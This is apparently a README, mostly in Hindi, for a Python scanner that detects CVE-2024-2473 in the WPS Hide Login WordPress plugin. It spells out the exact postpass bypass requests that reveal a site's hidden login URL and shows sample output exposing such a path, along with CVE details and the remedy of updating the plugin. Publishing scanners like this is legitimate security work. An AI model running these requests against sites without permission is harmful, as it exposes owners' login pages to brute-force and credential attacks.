
Wordpress Hidden Login Page Disclosure. Detect Login Page Disclosure in WordPress sites running WPS Hide Login ≤ 1.9.15.2 (CVE-2024-2473)
वर्डप्रेस साइटों पर WPS Hide Login ≤ 1.9.15.2 चला रहे लॉगिन पृष्ठ प्रकटीकरण का पता लगाने के लिए एक पेशेवर Python स्कैनर
Venexy द्वारा कोडित
WPS Hide Login एक लोकप्रिय WordPress प्लगइन है जो प्रशासकों को डिफ़ॉल्ट /wp-login.php URL को एक कस्टम, छिपे हुए पथ में बदलने की अनुमति देता है — जो अस्पष्टता के माध्यम से सुरक्षा के रूप में कार्य करता है।
यह स्कैनर CVE-2024-2473 का पता लगाता है, एक भेद्यता जहाँ action=postpass पैरामीटर प्रदान करके प्लगइन के सुरक्षा तंत्र को पूरी तरह से बायपास किया जा सकता है, जिससे छिपा हुआ लॉगिन पृष्ठ URL अप्रमाणित हमलावरों को उजागर हो जाता है।
WPS Hide Login प्लगइन वर्डप्रेस लॉगिन पृष्ठ को डिफ़ॉल्ट /wp-login.php से प्रशासक द्वारा चुने गए कस्टम URL पर स्थानांतरित करता है। हालांकि, 1.9.15.2 तक के सभी संस्करणों में, /wp-login.php या /wp-admin/ को action=postpass क्वेरी पैरामीटर प्रदान करने से यह सुरक्षा बायपास हो जाती है, जिससे छिपे हुए लॉगिन फॉर्म का वास्तविक क्रिया URL प्रकट होता है — प्रभावी रूप से किसी भी अप्रमाणित हमलावर को गुप्त लॉगिन पथ उजागर होता है।
स्कैनर भेद्यता के आक्रमण प्रवाह को तीन चरणों में दोहराता है:
Phase 1 ─► पुष्टि करें कि लक्ष्य एक WordPress स्थापना है
│
▼
Phase 2a ─► POST /wp-login.php?action=postpass
बॉडी के साथ: action=lostpassword&post_password=test
जाँच: HTTP 200 + lostpasswordform मौजूद + बॉडी में कोई wp-login.php नहीं
फॉर्म क्रिया विशेषता से छिपा लॉगिन URL निकालें
│
Phase 2b ─► POST /wp-admin/?action=postpass
जाँच: HTTP 302 पुनर्निर्देशन जिसमें reauth=1 या /login शामिल हो
│
▼
खोजे जाने पर छिपा लॉगिन URL रिपोर्ट करें
यदि या तो Phase 2a या Phase 2b मेल खाता है, तो लक्ष्य को असुरक्षित के रूप में चिह्नित किया जाता है।
requests लाइब्रेरी1. रिपॉजिटरी को क्लोन करें
git clone https://github.com/m4xsec/CVE-2024-2473.git
cd CVE-2024-2473
2. निर्भरताएँ स्थापित करें
pip install requests
नोट: Python वर्चुअल वातावरण या Kali Linux का उपयोग करने वाले सिस्टम पर, आपको आवश्यकता हो सकती है:
pip install requests --break-system-packages
python CVE-2024-2473.py -u <TARGET_URL> [-t TIMEOUT]
| तर्क | विवरण | डिफ़ॉल्ट |
|---|---|---|
-u, --url | लक्ष्य WordPress आधार URL |
# मूल स्कैन
python CVE-2024-2473.py -u https://example.com
# कस्टम टाइमआउट के साथ स्कैन
python CVE-2024-2473.py -u https://example.com --timeout 15
# HTTP पर स्कैन
python CVE-2024-2473.py -u http://192.168.1.100
┌─────────────────────────────────────────────────────────────┐
│ CVE-2024-2473 • WPS Hide Login Page Identifier │
│ Coded by Venexy | https://github.com/m4xsec │
└─────────────────────────────────────────────────────────────┘
===============================================================
TARGET https://example.com
TIME 2024-11-01 18:00:00
TIMEOUT 10s
===============================================================
[18:00:00] [*] Phase 1 | Fingerprinting WordPress installation ...
[18:00:01] [+] WordPress confirmed — https://example.com
[18:00:01] [*] Phase 2 | Testing CVE-2024-2473 bypass vectors ...
[18:00:01] [*] Vector A | POST /wp-login.php?action=postpass
+- Status : 200 Result : MATCH
[18:00:02] [*] Vector B | POST /wp-admin/?action=postpass
+- Status : 302 Result : MATCH
###############################################################
## VULNERABILITY CONFIRMED -- CVE-2024-2473 ##
###############################################################
Plugin WPS Hide Login <= 1.9.15.2
Severity Medium (CVSS 5.3 / EPSS 93rd percentile)
CWE CWE-200 — Exposure of Sensitive Information
CVSS Vector AV:N / AC:L / PR:N / UI:N / S:U / C:L / I:N / A:N
[18:00:02] [VULN] Bypass confirmed via /wp-login.php?action=postpass
====================================================
HIDDEN LOGIN URL DISCOVERED
====================================================
>> https://example.com/my-secret-admin-path/
====================================================
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है।
लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए उत्तरदायी नहीं है। किसी भी सुरक्षा मूल्यांकन से पहले हमेशा लक्ष्य सिस्टम स्वामी से स्पष्ट लिखित अनुमति प्राप्त करें। अनधिकृत स्कैनिंग या प्रणालियों का शोषण अवैध और अनैतिक है।
जिम्मेदारी से उपयोग करें।
Venexy द्वारा ❤️ से कोडित
यदि यह उपकरण आपकी मदद करता है, तो रिपॉजिटरी को ⭐🌟🌟🌟 देने पर विचार करें।
| फ़ील्ड | विवरण |
|---|
| CVE ID | CVE-2024-2473 |
| प्रभावित | WPS Hide Login प्लगइन ≤ 1.9.15.2 for WordPress |
| गंभीरता | मध्यम |
| CVSS स्कोर | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |
| CWE | CWE-200 — संवेदनशील जानकारी का प्रकटीकरण |
| EPSS स्कोर | 0.10433 (93वाँ प्रतिशतक) |
| प्रमाणीकरण आवश्यक | कोई नहीं |
| विक्रेता | WPServeur |
| उपाय | प्लगइन को संस्करण > 1.9.15.2 में अपडेट करें |
| — |
-t, --timeout | सेकंड में HTTP अनुरोध टाइमआउट | 10 |
| संसाधन | लिंक |
|---|
| NVD — CVE-2024-2473 | https://nvd.nist.gov/vuln/detail/CVE-2024-2473 |
| Wordfence सलाह | https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wps-hide-login/wps-hide-login-19152-login-page-disclosure |
| WPS Hide Login प्लगइन | https://wordpress.org/plugins/wps-hide-login/ |
| CWE-200 | https://cwe.mitre.org/data/definitions/200.html |
| CVSS 3.1 कैलकुलेटर | https://www.first.org/cvss/calculator/3.1 |